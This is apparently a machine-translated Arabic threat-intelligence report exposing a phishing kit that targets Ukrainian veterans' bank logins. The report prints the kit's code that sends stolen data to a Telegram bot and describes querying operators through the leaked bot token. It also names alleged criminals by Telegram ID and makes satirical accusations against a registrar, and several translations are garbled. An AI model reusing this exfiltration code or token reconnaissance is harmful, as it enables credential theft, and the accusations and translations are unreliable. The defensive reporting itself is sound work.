6
استدعاءات واجهة برمجة التطبيقات (API) لإزالة الحجب
2
مشاريع التصيد الاحتيالي المتوازية
<30
بضع دقائق حتى اكتمال التحليل
إفصاح عن الجهة الراعية(انقر للتوسيع)
نقدم لكم الراعي الرسمي لهذا التحقيق
🏆 شركة مجموعة NiceNIC الدولية المحدودة 🏆
الأكثر موثوق المسجل الذي تتعاون مع Netcraft (عن طريق خداع نظامهم) · المورد الرسمي للنطاقات لـ سوق المخدرات «كراكن» · مزود خصومات على المشتريات بالجملة · من أشد المتابعين لـ "المحتال النموذجي" مجتمع VK — لكنه لم يشترِ بعد دورة تدريبية حول إخفاء الهوية
0
تقارير الإساءة
تم تنفيذها
- على الرغم من ادعائه أنه «صيني» (من هونغ كونغ)، فإن المبدع ينحدر من غورلوفكا، جمهورية دونيتسك الشعبية. العلامة التجارية الصينية هي مجرد زخرفة — تمامًا مثل «شروط الخدمة» الخاصة بهم
- يحافظ على دعم اللغة الروسية عبر «فكونتاكتي» و«Telegram»، تبيع
.ru مقابل 200 دولار، في حين أن «reg.ru» تتقاضى 120₽ (~$1.30) - التعليقات السلبية على موقع Trustpilot التي تشير إلى نطاقات مواقع بيع المخدرات يختفون في ظروف غامضة. هل هي مصادفة؟ بالطبع لا
- مشترك نشط في "المحتال النموذجي" (المحتال النموذجي) مجتمع VK — عندما يتابع مسجلك مجموعات احتيالية، فإنك تعرف جمهوره المستهدف
- يتعاون مع نتكرافت ما يكفي فقط لتجنب شطبها من القائمة، مع الحفاظ في الوقت نفسه على البنية التحتية لنطاقات التصيد الاحتيالي والمقامرة والمخدرات
وفي الوقت نفسه، في برنامج «المحتال النموذجي»:
وعد لراعينا: عندما يصبح هذا المنشور من حساب «Типичный Мошенник» حقيقة واقعة — وبناءً على ما نعرفه، فإن الأمر مجرد مسألة عندما، وليس إذا — سيقوم فريقنا بأكمله بالتسجيل على «فكونتاكتي» والانضمام إلى المجموعة. اعتبروا ذلك بمثابة تصفيق حار من جانبنا. 👏
* هذا مقال ساخر. لم تقم شركة NiceNIC برعاية هذا التحقيق. لكنها جعلت إجراؤه أمراً ضرورياً برفضها اتخاذ أي إجراء بشأن بلاغاتنا المتعلقة بالإساءات لمدة تزيد عن 5 أيام. كل ما ورد أعلاه يستند إلى معلومات متاحة للجمهور وإلى خبرتنا العملية. اقرأ تقريرنا الكامل عن NiceNIC →
ما توصل إليه موقع PhishDestroy
في 20 مارس 2026، أشارت Pipeline الآلية للكشف عن التهديدات التابعة لـ PhishDestroy إلى dopomogvoina[.]sbs — نطاق تم تسجيله مؤخرًا ويستضيف موقعًا للتصيد الاحتيالي ينتحل صفة "درع الحامي" (درع المدافع)، وهو موقع مزيف يزعم تقديم مساعدات عسكرية لأوكرانيا. يستهدف الموقع المحاربين القدامى الأوكرانيين والجرحى في القتال وأسر الجنود الشهداء، ويوهمهم بتقديم مساعدات مالية حكومية بينما يقوم في الواقع بسرقة بيانات تسجيل الدخول المصرفية لخمسة من أكبر البنوك الأوكرانية.
فيما يلي تحليل شامل لكل ما كشفه تحليلنا الآلي: أساليب الهندسة الاجتماعية، والبنية التحتية التقنية، ونظام التحكم في الوقت الفعلي الذي يديره المشغلون، وهويات الأشخاص الذين يديرونه.
تقييم الأثر
يستهدف الموقع على وجه التحديد الفئات الأكثر ضعفاً: المحاربين القدامى الذين يعانون من اضطراب ما بعد الصدمة (PTSD)، وأسر الجنود الذين قُتلوا في الخدمة والذين يسعون للحصول على مساعدة حكومية، والعسكريين المصابين الذين يواجهون صعوبات في التعامل مع الأنظمة البيروقراطية المعقدة. فكل بيانات اعتماد تُسرق قد تؤدي إلى الاستيلاء الكامل على الحساب في غضون دقائق.
القسم الأول: الطُعم — مؤسسة المساعدات العسكرية المزيفة
النطاق dopomogvoina[.]sbs تم تسجيله في 20 مارس 2026 من خلال شركة مجموعة NiceNIC الدولية المحدودة، وهي هيئة تسجيل لها سجل موثق جيدًا من حيث بطء الاستجابة لحالات الإساءة أو عدم الاستجابة لها على الإطلاق. إن .sbs TLD (Side-By-Side) هو نطاق عام عالي المستوى (gTLD) منخفض التكلفة يُستغل بشكل متكرر لإنشاء بنى تحتية مؤقتة لأغراض التصيد الاحتيالي.
يقدم الموقع نفسه على أنه بوابة مساعدة احترافية مرتبطة بالحكومة. يملأ علم أوكرانيا الجزء العلوي من الصفحة، وتضفي الصور العسكرية مصداقية على الموقع، كما أن الصفحة مكتوبة بعناية باللغة الأوكرانية باستخدام صياغة بيروقراطية تعكس طابع البرامج الحكومية الشرعية.

لقطة الشاشة 5 — الصفحة الرئيسية لموقع التصيد الاحتيالي الذي ينتحل صفة «Щит Захисника» (درع المدافع).
ولبناء المصداقية، قام المشغلون بتلفيق عداد إحصائي تم عرضه في مكان بارز على الصفحة الرئيسية:
- 2,847 طلبًا — مما يعني أن الآلاف قد تلقوا المساعدات بالفعل
- تم توزيع ₴47.2M — شخصية بارزة لكنها مقنعة في جامعة ألتاي
- 19 برنامجًا — مما يشير إلى عملية شاملة تتضمن برامج متعددة
هذه الأرقام ملفقة بالكامل، وقد تم تضمينها بشكل ثابت في كود مصدر الصفحة دون أي ارتباط بالخادم الخلفي. وهي تخدم غرضًا واحدًا: تقديم دليل اجتماعي للتغلب على تردد الضحية.
القسم الثاني: الفخ — 5 بنوك، هدف واحد
بعد النقر على زر «Подати заявку» (تقديم الطلب)، تظهر للضحية شاشة لاختيار البنك. وتظهر خمسة من أكبر البنوك التجارية في أوكرانيا كخيارات، مع عرض العلامة التجارية والشعار الرسميين لكل منها. وهنا يتحول أسلوب الهندسة الاجتماعية من التلاعب العاطفي إلى السرقة التقنية.

لقطة الشاشة 6 — شاشة اختيار البنك. كل خيار يؤدي إلى تسلسل مخصص لسرقة بيانات الاعتماد.
كشف تحليل حزمة جافا سكريبت الخاصة بالموقع أن كل بنك لديه تسلسل فريد من نوعه لجمع بيانات الاعتماد عبر عدة خطوات، مصممة خصيصًا لتتوافق مع مسار المصادقة الفعلي لذلك البنك:
PrivatBank
تسجيل الدخولكلمة المروررقم التعريف الشخصي (PIN)رسالة نصية قصيرة
مونوبانك
تسجيل الدخولرقم التعريف الشخصي (PIN)رسالة نصية قصيرةالبريد الإلكتروني
أوشادبانك
تسجيل الدخولالتحققرسالة نصية قصيرة
PUMB
تسجيل الدخولرسالة نصية قصيرة
بنك أوكرسيب
تسجيل الدخولرقم التعريف الشخصي (PIN)رسالة نصية قصيرة
يتبع مسار الهجوم في كل بنك النمط نفسه:
صفحة مساعدات مزيفة
اختيار البنك
نسخة مطابقة من صفحة تسجيل الدخول
اعتراض المصادقة الثنائية (2FA)
الاستيلاء على الحساب

لقطة الشاشة 7 — صفحة تسجيل الدخول المقلدة لموقع PrivatBank.

لقطة الشاشة 9 — صفحة تسجيل الدخول إلى PUMB المستنسخة.

لقطة الشاشة رقم 10 — مسار الهجوم الكامل: بدءًا من صفحة المساعدات العسكرية المزيفة، مرورًا باختيار البنك، وصولاً إلى سرقة بيانات الاعتماد والاستيلاء على الحساب.
مجموعة التقنيات المستخدمة: تطبيق React أحادي الصفحة (SPA) الواجهة الأمامية التي يتم تقديمها عبر شبكة توزيع المحتوى (CDN) من Cloudflare، مع Express.js الجزء الخلفي الذي يتولى تسريب بيانات الاعتماد. تتيح بنية React إنشاء نماذج متعددة الخطوات تعمل بسلاسة ولا يمكن تمييزها عن واجهات الخدمات المصرفية الأصلية.
القسم 3: التحكم المباشر من قبل المشغل
هذا ليس مجرد أداة لجمع بيانات الاعتماد تعتمد على قاعدة بيانات ثابتة. تتضمن مجموعة أدوات التصيد ما يلي: لوحة تحكم WebSocket المباشرة التي تتيح للمشغل البشري التحكم في كل جلسة من جلسات الضحايا في الوقت الفعلي.
نقطة نهاية WebSocket الموجودة على wss://dopomogvoina[.]sbs/ws يدعم أنواع الرسائل التالية:
register — New victim session created
update_user_data — Stolen credentials transmitted to operator
next_step — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question — Operator sends custom prompt to victim
يتيح هذا التحكم في الوقت الفعلي للمشغل ما يلي:
- فرض حالة الانتظار — عرض الرسالة "جاري معالجة طلبك..." أثناء قيامهم بتسجيل الدخول إلى الحساب المصرفي الحقيقي للضحية
- إعادة التوجيه إلى خطوة معينة — إعادة طلب رمز الرسالة القصيرة في حالة انتهاء صلاحية الرمز الأول
- عرض رسائل خطأ وهمية — «الرمز غير صالح، يرجى إعادة إدخاله» لجمع عدة رموز مصادقة ثنائية (2FA)
- طرح أسئلة مخصصة — طلب تاريخ الميلاد أو رقم البطاقة أو أي بيانات إضافية أثناء الجلسة
ما الذي يجعل هذا الأمر خطيرًا
التحكم المباشر من قبل المشغل يتغلب على إجراءات الحماية القائمة على الوقت في المصادقة الثنائية (2FA). حيث يعترض المشغل رمز الرسالة النصية القصيرة ويستخدمه خلال فترة صلاحيته — التي تتراوح عادةً بين 30 و120 ثانية — بينما تظل الضحية تحدق في رسوم متحركة مزيفة تشير إلى أن العملية «قيد المعالجة».

لقطة الشاشة 8 — نموذج إدخال رقم الهاتف المستخدم لبدء عملية سرقة بيانات الاعتماد.

لقطة الشاشة 11 — لوحة التحكم في البوت الخاصة بالمشغل، والتي تتيح له التحكم في جلسات الضحايا في الوقت الفعلي.
مجموعة البيانات الكاملة التي تمت سرقتها في كل جلسة: phone, password, PIN, SMS code, card number, date of birth، و email.
القسم 4: ما وراء Cloudflare — مشروعان، خادم واحد
يعمل نظام الوكالة الخاص بـ Cloudflare على إخفاء الخادم الأصلي، لكن Pipeline لتحليل البنية التحتية لـ PhishDestroy تمكن من تحديد عنوان IP الأصلي الحقيقي: 45.131.214[.]148، والمستضاف على RapidSeedbox / LeaseWeb في هولندا.
تفصيل مهم: dopomogvoina[.]sbs يتم توجيهه عبر Cloudflare، مع إخفاء عنوان IP المصدر. لكن نظامنا يتتبع أيضًا hlpforvpeople[.]sbs — نطاق ذو صلة تم تسجيله عبر نفس مسجل NiceNIC مع أنماط متطابقة. وهذا النطاق هو ليس خلف Cloudflare، مما يكشف عن عنوان IP الأصلي بشكل مباشر: 45.131.214[.]148.
الاتصال بهذا العنوان IP مباشرةً — دون Host العنوان — كشف عن شيء غير متوقع: أ موقع تصيد مختلف تمامًا. بدلاً من المساعدات العسكرية الأوكرانية، تم تقديم خدمة المضيف الافتراضي "بطاقة الرعاية الصحية"، وهي عملية تصيد احتيالي تتعلق بالتأمين الصحي في إندونيسيا. نفس الخادم، ضحايا مختلفون تمامًا، بلد مختلف تمامًا.
نفس الخادم، نفس المشغلين، ضحايا مختلفون
- المشروع 1: المساعدات العسكرية الأوكرانية → سرقة بيانات اعتماد مصرفية من المحاربين القدامى
- المشروع 2: التأمين الصحي الإندونيسي → يسرق بيانات الرعاية الصحية الخاصة بالمواطنين
- نفس مجموعة أدوات Express.js، ونفس لوحة التحكم في الوقت الفعلي عبر WebSocket
- نفس واجهة إدارة الخادم BT-Panel (宝塔)
- المجال C2 للمشروع الثاني:
rezervtemka[.]cc — لوحة تصيد معروفة تم تحديدها في قاعدة بيانات التهديدات الخاصة بـ PhishDestroy - التعليقات باللغة الروسية في شفرة المصدر الخاصة بالمشروع الإندونيسي، يؤكد المطورون أنفسهم التابعون لـ CIS

لقطة الشاشة 12 — عمليتان متوازيتان للتصيد الاحتيالي تشتركان في نفس خادم المنشأ: المساعدات العسكرية الأوكرانية (dopomogvoina) والتأمين الصحي الإندونيسي (HealthCare ID).
قالب التصيد الاحتيالي الإندونيسي هو مجموعة معروفة تم تعقبها في قاعدة بيانات معلومات التهديدات الخاصة بـ PhishDestroy. وقد لاحظنا نشر نسخ مختلفة من هذا النموذج بالذات في أنحاء جنوب شرق آسيا — تستهدف المؤسسات المالية الإندونيسية والتايلاندية والفيتنامية. ويكتفي المشغلون باستبدال النماذج الخاصة بكل بلد مع إعادة استخدام البنية التحتية الخلفية نفسها.
مجرمون لا يميزون بين الأبرياء والمجرمين
هذه هي حقيقة عمليات التصيد الاحتيالي الحديثة:
لا يهم المشغلين من الذي يسرقونه. المحاربون القدامى الأوكرانيون الباحثون عن مساعدات عسكرية، والعمال الإندونيسيون الذين يشترون التأمين الصحي — يتغير الهدف وفقًا للنموذج الذي يحقق أكبر عائدات. ويقوم نفس المشغلون الناطقون بالروسية بإدارة الحملتين في آن واحد من نفس الخادم، متنقلين بين الضحايا في بلدان مختلفة كما لو كانوا يغيرون قنوات التلفزيون. واليوم، المستهدف هو البنوك الأوكرانية. وغدًا قد تكون البنوك الإسرائيلية — كما سأل «بونيا» بالفعل في مارس 2026.
القسم 5: ملف config.json الذي كشف كل شيء
إليكم كيف أدى ملف واحد تم تكوينه بشكل خاطئ إلى انهيار العملية برمتها — خطوة بخطوة.
بعد تحديد المشروع الثاني لخادم المصدر، قام موقع PhishDestroy بـ محلل JS — أداة التحليل الآلي لـ JavaScript الخاصة بنا — تم توجيهها نحو حزمة موقع التصيد الإندونيسي على https://45.131.214[.]148/assets/index-ZMQxHb_h.js. استخرج المُحلل جميع نقاط نهاية واجهة برمجة التطبيقات (API) وعناوين URL الخارجية ومسارات التكوين من ملف جافا سكريبت الذي يبلغ حجمه 335 كيلوبايت. ومن بين النتائج التي توصل إليها:
- خمس نقاط نهاية لواجهة برمجة التطبيقات (API) على
rezervtemka[.]cc — لوحة C2 الخاصة بالتحقق من بيانات الاعتماد - اتصال WebSocket بـ
wss://rezervtemka[.]cc - دمج «فيسبوك بيكسل» لتتبع الضحايا
- إشارة إلى
/config.json — يتم تحميله أثناء التشغيل لتكوين روبوت Telegram
وانطلاقًا من هذا الدليل، قمنا باسترداد /config.json من عنوان IP المصدر. كان الملف متاحًا دون أي مصادقة — حيث كان موجودًا في جذر موقع الويب، ويمكن لأي شخص قراءته:
async function loadConfig() {
const response = await fetch('/config.json');
// ...
}
async function sendNotification() {
const cfg = await loadConfig();
await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
method: 'POST',
body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
});
}
الـ /config.json كان من الممكن الوصول إلى الملف مباشرةً من عنوان IP الأصلي — لا توجد مصادقة، ولا تحكم في الوصول، مجرد ملف JSON عادي موجود في جذر الموقع الإلكتروني:
{
"bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"chat_id": "-100XXXXXXXXXX"
}
يُعد رمز بوت Telegram اسم المستخدم وكلمة المرور في آن واحد. ويمكن لأي شخص يمتلك هذا الرمز إجراء استدعاءات API بصفته ذلك البوت. وقد ترك المشغلون رموزهم في ملف متاح للجمهور. وبعد ستة استدعاءات لواجهة برمجة التطبيقات (API)، أصبح لدينا كل شيء:
getMe — هوية الروبوت: "MonettiCRM" (@MonettiCRM_bot)
getChat(chat_id) — اسم المجموعة: «Idr card» مع رابط دعوة نشط
getChatAdministrators — 3 إداريين، من بينهم منشئ المجموعة
getChat(creator_id) — المؤلف: @monettiescobar، Telegram Premium، ملف تعريف الأعمال، المنطقة الزمنية UTC+3
getChat(admin2_id) — المسؤول الثاني: ملف تعريف فارغ، يُشتبه في أنه حساب بديل
getChatMemberCount — يبلغ إجمالي عدد الأعضاء في مجموعة المشغلين 5 أعضاء

لقطة الشاشة 13 — سلسلة OSINT الكاملة: من ملف config.json الذي تم الكشف عنه إلى تحديد هوية المشغل بالكامل في 6 استدعاءات لواجهة برمجة التطبيقات.
بدءًا من ملف واحد تم تكوينه بشكل خاطئ وصولاً إلى تحديد هوية المشغلين بالكامل من خلال ستة طلبات HTTP. لا توجد ثغرات أمنية، ولا وصول غير مصرح به — مجرد مكالمات قياسية لواجهة برمجة تطبيقات روبوت Telegram باستخدام رمز مميز تركه المشغلون أنفسهم مكشوفًا.
القسم 6: المشغلون
ملاحظة حول الإبداع الإجرامي
ما يلي هو درس نموذجي في الاختيارات السيئة للأسماء المستعارة. لدينا مونيتي إسكوبار — لأنه لا شيء يعبر عن «التواضع» مثل تسمية نفسك على اسم أشهر تاجر مخدرات في التاريخ. ثم هناك بونيا، والمعروف أيضًا باسم بابازاكونفور (حرفياً «أبي-اللص-بموجب القانون» — في إشارة مبطنة إلى التسلسل الهرمي الإجرامي الروسي)، بوا، و بوبوليك. وأخيرًا ديفويس، واسمه المستعار @devosus يبدو هذا بشكل مثير للريبة وكأنه «dev ops us» — مطور أدرج المسمى الوظيفي في اسم المستخدم الخاص به. هؤلاء هم الأشخاص الذين ظنوا أنهم قادرون على التغلب على أنظمة الاستخبارات الآلية الخاصة بالتهديدات. الحرق: لم يتمكنوا من ذلك.

لقطة الشاشة 14 — مجموعة مشغلي Telegram «Idr card»، التي تم الكشف عنها من خلال رمز البوت المسرب.

المالك / المؤسس
مونيتي إسكوبار
@monettiescobar
معرّف Telegram: 8135223234
Telegram Premium، ملف تعريف الأعمال
المنطقة الزمنية: UTC+3 (منطقة رابطة الدول المستقلة)
10 رسائل عامة — إجراءات أمنية صارمة (OPSEC)
دردشة TraFFeeQميدوسا جوجل إعلاناتقناة «ديبفايكس»

مشغل / حركة المرور
بونيا
@BoaCC159
معرّف Telegram: 6242202706
المعروف أيضًا باسم: PapaZakonVor، Boa، bubullikk
261 رسالة موزعة على 12 مجموعة
DC2 — أمستردام، هولندا
CryptoGrabسوق STYXرايفن سي سيدردشة إمبايرحل فينيكس
مطور / مبرمج
ديفويس
@devosus
معرّف Telegram: 8213612730
مطور مجموعة أدوات التصيد الاحتيالي — يُطلق عليه المشغلون لقب «المبرمج»
يُطلب منهم «التفكير في الإجراءات الدفاعية» عند اكتشاف الاختراق
تصميم يهدف إلى تقليل الأثر على البيئة إلى أدنى حد ممكن
المقبض @devosus ≈ "dev ops us" — المسمى الوظيفي كاسم مستخدم
مطور مجموعة الأدواتالبنية التحتيةالأمن
مونتي إسكوبار — «الزعيم»
تلتزم شركة «مونتي» بأمن تشغيلي صارم — فقط 10 رسائل عامة عبر مجموعتين. لكن المجموعتين ترويان القصة: دردشة TraFFeeQ (المضاربة المرورية لأغراض الاحتيال)، ميدوسا جوجل إعلانات (إعلانات Google غير المشروعة)، و قناة «ديبفايكس». يذكر ملفه الشخصي التجاري على Telegram عبارة «Есть предложение» ("لدي اقتراح") — الإعلان الصريح عن الخدمات. ويؤكد التوقيت الزمني UTC+3 (الذي يتطابق مع توقيت موسكو/مينسك/كييف) وساعات العمل على مدار الساعة طوال أيام الأسبوع أن هذه العملية تتم من مقرها في رابطة الدول المستقلة وتعمل على مدار الساعة.
بونيا — المتهور
على عكس الإجراءات الأمنية التشغيلية (OPSEC) الصارمة التي يتبعها «مونتي»، فإن «بونيا» (الاسم المستعار السابق: بابازاكونفور — أي ما يعني تقريبًا «الأب اللص بموجب القانون») ترك وراءه آثارًا رقمية هائلة — 261 رسالة موزعة على 12 مجموعة سرية. ويبدو سجل محادثاته وكأنه سيرة ذاتية لمجرم:
كلمات بونيا بنفسها (مترجمة من الروسية)
- "الأسماك التي تتحمل تيارًا بقوة 2.0" → "مجرد محاولة تصيد [أمن البنوك] 2.0" — مناقشة مدى توافق أدوات التصيد الاحتيالي مع أحدث أنظمة الأمان المصرفية
- "من الصعب العثور على هدايا جيدة" → "من الصعب العثور على ناقلين جيدين للأموال" — البحث عن شركاء في عمليات سحب الأموال
- "تعالوا للعمل معي في مركز الثقافة" → "تعال واعمل في مركز الاتصال الخاص بي" — توظيف المشغلين
- "هل يوجد هنا من عمل مع البنوك الإسرائيلية؟" → "هل من أحد هنا عمل مع البنوك الإسرائيلية؟" — التوسع ليشمل أهدافًا جديدة (مارس 2026)
- "لا أرى أي شعارات على الفينك بشكل خاص" → "لا أرى الكثير من سجلات الشؤون المالية" — مناقشة جودة بيانات الاعتماد المسروقة
- "إذا كان كل وكيل يستهلك 1-2 بنك تيار" → "وكيل واحد لـ 1-2 بنك فقط" — مناقشة مسألة الأمن التشغيلي في مجال الاحتيال المصرفي
- "لقد احتجز جهاز الصراف الآلي بطاقتها" → "ابتلعت آلة الصراف الآلي بطاقتها" — سرق «ناقل أموال» منهم مبلغ ₴60,000، مدعياً أن جهاز الصراف الآلي ابتلع البطاقة. حتى المجرمون يقعون ضحية عمليات الاحتيال على يد شركائهم أنفسهم.
تُظهر عضوياته في المجموعات صورة كاملة: CryptoGrab (مستنزفو أموال محافظ العملات المشفرة)، سوق STYX (سوق سرية للبيانات المسروقة)، أداة التحقق من Raven CC (أدوات التحقق من صحة بطاقات الائتمان)، دردشة إمباير و حل فينيكس (تنسيق عمليات الاحتيال). هذا ليس مجرماً ارتكب جريمة لمرة واحدة — بل هو شخص متجذر في منظومة الجرائم الإلكترونية.
ديفويس — المطور
العمود الفقري التقني للعملية. صُممت لتترك أثرًا ضئيلًا للغاية على الصعيد العام — وعندما تعرضت المجموعة للاختراق، اتصل بونيا به صراحةً: "@devosus فكر في الدفاع قبل أن يمزقوا مؤخرتنا" — "@devosus فكر في الدفاع قبل أن نتعرض لهزيمة ساحقة." رده الساخر على هذا الانتهاك — "عندما يكون في الإنتربول" ("متى يتم استخدام الاستيفاء") — مما يشير إلى أن هذه ليست المرة الأولى التي ينجون فيها بأعجوبة.
تحليل السلوك: فك شفرة 261 رسالة
قام Pipeline OSINT التابع لـ PhishDestroy بجمع وترجمة جميع الرسائل العامة البالغ عددها 261 رسالة من «بونيا» عبر 12 مجموعة سرية على تطبيق «Telegram» (يونيو 2024 — مارس 2026). ترجمة آلية عبر API من تطبيق DeepL مع تصحيح يدوي للسياق. تكشف الرسائل عن ملف تشغيلي كامل — مصنف أدناه حسب نوع النشاط الإجرامي.
توزيع الرسائل: 261 رسالة موزعة على 12 مجموعة
- 💬ONE|الدردشة — 91 رسالة (تنسيق عمليات الاحتيال)
- الأخبار/عمليات التحقق — 37 رسالة (عمليات احتيال تتعلق بالتحقق)
- رولكس | الدردشة العامة — 28 رسالة (إرسال بطاقات)
- دردشة إمباير — 24 رسالة (السوق السوداء)
- Фбстор — 23 رسالة (المراجحة في حركة المرور)
- FB-DOC — 22 رسالة (احتيال إعلاني)
- حل فينيكس — 17 رسالة (احتيال مصرفي)
- CryptoGrab — 11 رسالة (استنزاف العملات المشفرة)
- سوق STYX — رسالتان (سوق سرية)
- أداة التحقق من Raven CC — رسالتان (التحقق من البطاقة)
الاحتيال المصرفي والتصيد الاحتيالي
💬ONE|الدردشةمارس 2025
"لا يوجد هنا سوى 2.0 فيش"
وهنا توجد الأسماك التي يبلغ تيارها 2.0
مناقشة توافق أدوات التصيد الاحتيالي مع بروتوكولات الأمان المصرفية الأحدث
💬ONE|الدردشةمارس 2025
"يا أخي، لا يبيعون أي شيء على موقع «فيش» هنا، بل «فيش» هو وسيلة للدفع"
يا أخي، لا يبيعون هنا أي شيء مقابل الرقائق، بل الرقائق مخصصة للدفع فقط
التمييز بين التصيد الاحتيالي بهدف البيع والتصيد الاحتيالي بهدف السرقة المباشرة
حل فينيكسمارس 2026
"هل يوجد هنا من عمل مع البنوك في إسرائيل؟"
هل يوجد هنا من عمل مع البنوك الإسرائيلية؟
توسيع نطاق العمليات لتشمل القطاع المصرفي الإسرائيلي — قبل 5 أيام من بدء تحقيقنا
رولكس | الدردشة العامةسبتمبر 2024
"إذا كان هناك وكيل واحد، فسيكون عدد البنوك من 1 إلى 2 فقط"
إذا كان كل بروكسي يتحمل 1-2 بنك تيار
الأمن التشغيلي في حالات الاحتيال التي تشمل عدة بنوك: استخدام وكيل واحد لكل بنك أو بنكين لتجنب الكشف
رولكس | الدردشة العامةسبتمبر 2024
"لا أرى الكثير من السجلات المالية"
لا أرى أي شعار على الفينك بشكل خاص
الشكوى من جودة بيانات اعتماد الخدمات المصرفية المسروقة في الأسواق السوداء
ناقلو الأموال وعمليات سحب الأموال
💬ONE|الدردشةمارس 2025
"من الصعب العثور على قطرات جيدة"
من الصعب أيضًا العثور على هدايا جيدة
"Drops" = وسطاء ماليون يقومون بصرف الأموال المسروقة. يشكون من صعوبة التجنيد.
💬ONE|الدردشةمارس 2025
"تعال واعمل في مركز الاتصال الخاص بي"
تعالوا للعمل معي في مركز الرعاية
التجنيد النشط للأشخاص للعمل في مركز اتصالات احتيالي
الأخباريونيو 2024
"سُرقت منا 60 ألف"
لقد سُرق منا 60 ألف
سرق أحد «ناقلو الأموال» مبلغ ₴60,000 من المحتالين أنفسهم. يا لها من عدالة ساخرة.
الأخباريونيو 2024
"كيف بحق الجحيم يمكن لآلة الصراف الآلي أن تبتلع البطاقة؟"
كيف بحق الجحيم استطاعت ماكينة الصراف الآلي أن تبتلع البطاقة؟
ادعى «المهرب» أن جهاز الصراف الآلي «ابتلع» البطاقة ليحتفظ بالأموال المسروقة. محتالون يخدعون محتالين.
الأخباريونيو 2024
"لقد حولت المبلغ إلينا، لكننا لم نكن نملك القناة الرئيسية اللازمة لتحويل الأموال"
لقد حولت المبلغ إلينا، لكن لم يكن لدينا حساب «دروب» الرئيسي اللازم لتحويل الأموال
وصف سلسلة تحويل الأموال: الضحية → الحساب الوسيط → الناقل الرئيسي للأموال
الاحتيال في حركة المرور وإساءة استخدام الإعلانات
دردشة إمبايرمارس 2026
"أنا لا أستخدم «جوجل»، بل «فيسبوك» فقط"
حسناً، أنا لا أستخدم «جوجل»، بل «فيسبوك» فقط
متخصص في الاحتيال الإعلاني على فيسبوك — توجيه الزوار إلى صفحات التصيد الاحتيالي
FB-DOCفبراير 2026
"أنا أيضًا لن أخصص نسبة مئوية من ميزانية الإعلانات دون وجود ضامن"
أنا أيضًا لن أقوم بالتمويل مقابل نسبة مئوية من الإنفاق دون وجود ضامن
التفاوض بشأن شروط الدفع لتنفيذ حملات إعلانية احتيالية على فيسبوك
CryptoGrabيناير 2025
"جربت استخدام AML على فيسبوك لاستهداف السوق الأمريكية — لكنني لم أجد أي إعدادات جيدة على الإنترنت"
لقد حاولت البحث عن «أمل» على فيسبوك، لكنني لم أجد حتى روابط مفيدة قديمة على الإنترنت
محاولة استخدام إعلانات فيسبوك لتنفيذ عمليات احتيال متعلقة بمكافحة غسل الأموال تستهدف ضحايا في الولايات المتحدة
الملف النفسي: بونيا
يكشف مجموعة النصوص المكونة من 261 رسالة عن مجرم إلكتروني من المستوى المتوسط مع أنشطة متنوعة: التصيد الاحتيالي المصرفي، وشبكات غسل الأموال، والاحتيال في إعلانات فيسبوك، وسرقة العملات المشفرة، والتحقق من بطاقات الائتمان. السمات الرئيسية:
- الإهمال في العمل — 261 رسالة عبر مجموعات عامة باستخدام حساب واحد. وتشير الأسماء المستعارة المتعددة (PapaZakonVor → Boa → Bonya) إلى إدراكه لأهمية أمن العمليات (OPSEC) لكنه لم يلتزم بتطبيقه
- عقلية التوظيف — يدعو الناس بنشاط إلى «العمل في مركز الاتصال الخاص بي» ويبيع معرفته التشغيلية مقابل المال
- لامبالاة الضحية — يتناول الأهداف الأوكرانية والأوروبية والإسرائيلية والأمريكية بنفس القدر من الحياد. فالجغرافيا ليست سوى متغير في معادلة الاحتيال
- مشاكل الثقة — تعرض للخيانة من قِبل «ناقل الأموال» الخاص به مقابل ₴60 ألف. وهو ما يعكس، بشكل ساخر، انعدام الثقة الذي يزرعه في نفوس ضحاياه
- مدفوعة بالتوسع — حتى شهر مارس 2026، كانت تبحث بنشاط عن أسواق مصرفية جديدة (إسرائيل)، مما يشير إلى أن عملية التصيد الاحتيالي الأوكرانية ليست سوى واحدة من العديد من العمليات المتزامنة
بونيا: سجل الرسائل الكامل (253 رسالة موزعة على 12 مجموعة)
-- Phoenix Solution (16 رسالة) --
B
بونيا2026-03-17 14:22
هل يوجد هنا من عمل مع البنوك في إسرائيل؟هل يوجد هنا من عمل مع البنوك الإسرائيلية؟
B
بونيا2026-03-17 14:22
يعمل بهدوء أيضًا.نحن أيضًا نعمل بهدوء
B
بونيا2026-03-17 14:17
كيف الحال؟كيف حالك؟
B
بونيا2026-03-17 14:17
مرحباً بالجميعمرحباً بالجميع
B
بونيا2026-03-15 19:02
حسنًا، لقد تم إصلاح كل شيء تقريبًا الآن.حسناً، بشكل عام، تم تسوية كل شيء الآن
B
بونيا2026-03-15 19:02
حسنًا، الأمر يتطلب بعض الجهدحسنًا، لقد تسببنا في بعض المتاعب
B
بونيا2026-03-15 19:01
نعم، أنا أيضًا كنت أقوم بالكثير من العمل في الخفاء، الأمر فاشل.نعم، أنا أيضًا سئمت كثيرًا من العمل في الخفاء
B
بونيا2026-03-15 19:00
كيف كان يوم عطلتك؟كيف كان يوم العطلة؟
B
بونيا2026-03-15 19:00
جميعكم.مشترك بين الجميع
B
بونيا2026-03-14 14:29
لم يعد مجهولاً إلى هذا الحد الآن، حيث أصبح الجميع يعلمون أنه ماريك.لم يعد مجهولاً تماماً، فكل الناس يعرفون من هو «ماريك»
B
بونيا2026-03-14 14:24
الولادة من جديدولد من جديد
B
بونيا2026-03-14 14:24
أهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاهاأهاهاهاهاهاهاهاهاهاها
B
بونيا2026-03-14 14:23
شعرت بالاستياء عندما رأيت أن غرفة الدردشة قد اختفت.لقد شعرت بالاستياء حقًّا عندما رأيت أن الدردشة قد اختفت
B
بونيا2026-03-14 14:22
ظننت أنني لن أجدك أبدًا.كنتُ أظن أنني لن أجدكم
B
بونيا2026-03-14 14:22
كوكو
B
بونيا2026-03-14 14:22
اللعنةإيبا
-- 👨⚕️ FB-DOC — دردشة حول التحكيم في قضايا حركة المرور (21 رسالة) --
B
بونيا2026-03-15 07:23
@fbdoc21@fbdoc21
B
بونيا2026-03-15 07:20
